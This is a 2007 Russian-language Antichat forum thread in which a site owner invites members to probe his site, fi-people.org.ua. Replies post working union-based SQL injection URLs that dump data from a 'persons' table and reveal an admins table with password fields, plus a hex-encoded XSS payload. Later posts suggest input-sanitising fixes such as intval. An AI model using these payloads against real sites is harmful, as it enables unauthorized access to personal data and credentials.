ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Проверка на уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

F.i.p.
  #1  
Старый 31.08.2007, 23:50
Аватар для bogus92
bogus92
Новичок
Регистрация: 03.08.2007
Сообщений: 13
Провел на форуме:
46093

Репутация: 3
Отправить сообщение для bogus92 с помощью ICQ
По умолчанию F.i.p.

http://fi-people.org.ua
Сайт пока очень сырой, но уязвимости, я думаю найдуться.
 

  #2  
Старый 01.09.2007, 15:25
Аватар для Red_Red1
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию

Вот пока найдена скуль иньекция.
http://fi-people.org.ua/view.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13/*
Очень мало на сайте всего, негде искать!!!

А вот и информация через скуль
http://fi-people.org.ua/view.php?id=-1%20union%20select%201,name,3,4,5,6,7,8,9,10,11,12 ,13%20from%20persons/*


Ну блин.... только что заметил. Версия мускула 5.*.* поэтому можно увидеть инфу из всех таблиц и ничего не нужно подбирать.

Итого: Есть 20 таблиц. Есть таблица admins (правда пока недоступна почемуто) в ней есть поля id,name,password может еще какие я не смотрел. Ну думаю этого хватит.

Последний раз редактировалось Red_Red1; 01.09.2007 в 15:41..
 

  #3  
Старый 01.09.2007, 16:00
Аватар для Constantine
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

SIXSS =)))

http://fi-people.org.ua/view.php?id=-1+union+select+1,0x3c7363726970743e616c65727428277 8737327293c2f7363726970743e,3,4,5,6,7,8,9,10,11,12 ,13/*
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 

  #4  
Старый 01.09.2007, 19:22
Аватар для NOmeR1
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

Попробуй для устранения SQL-inj использовать
PHP код:
$_GET['id'] = preg_replace('/[^0-9]/','',$_GET['id']); 
просто прикольный метод... сорри за оффтоп
 

  #5  
Старый 01.09.2007, 19:37
Аватар для bogus92
bogus92
Новичок
Регистрация: 03.08.2007
Сообщений: 13
Провел на форуме:
46093

Репутация: 3
Отправить сообщение для bogus92 с помощью ICQ
По умолчанию

Спасибо всем, кто ответил(всем атплюсовал). А переменные я немного по-дрому фильтровал

$id = urldecode(htmlspecialchars($id = $_POST['id'], ENT_QUOTES));
 

  #6  
Старый 01.09.2007, 19:49
Аватар для bogus92
bogus92
Новичок
Регистрация: 03.08.2007
Сообщений: 13
Провел на форуме:
46093

Репутация: 3
Отправить сообщение для bogus92 с помощью ICQ
По умолчанию

хм... а я хоть добавил репутацию? а то у меня 0 светиться...
 

  #7  
Старый 01.09.2007, 21:04
Аватар для bogus92
bogus92
Новичок
Регистрация: 03.08.2007
Сообщений: 13
Провел на форуме:
46093

Репутация: 3
Отправить сообщение для bogus92 с помощью ICQ
По умолчанию

ЗЫ. Поправил ещё кое-что. Теперь за незатверждённых людей нельзя ни голосовать ни просматривать информацию о них.
 

  #8  
Старый 02.09.2007, 22:32
Аватар для Slon
Slon
Участник форума
Регистрация: 09.12.2005
Сообщений: 162
Провел на форуме:
701592

Репутация: 91
По умолчанию

Цитата:
просто прикольный метод... сорри за оффтоп
intval() помоему удобнее. Сорри за оффтоп)
 
Закрытая тема





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ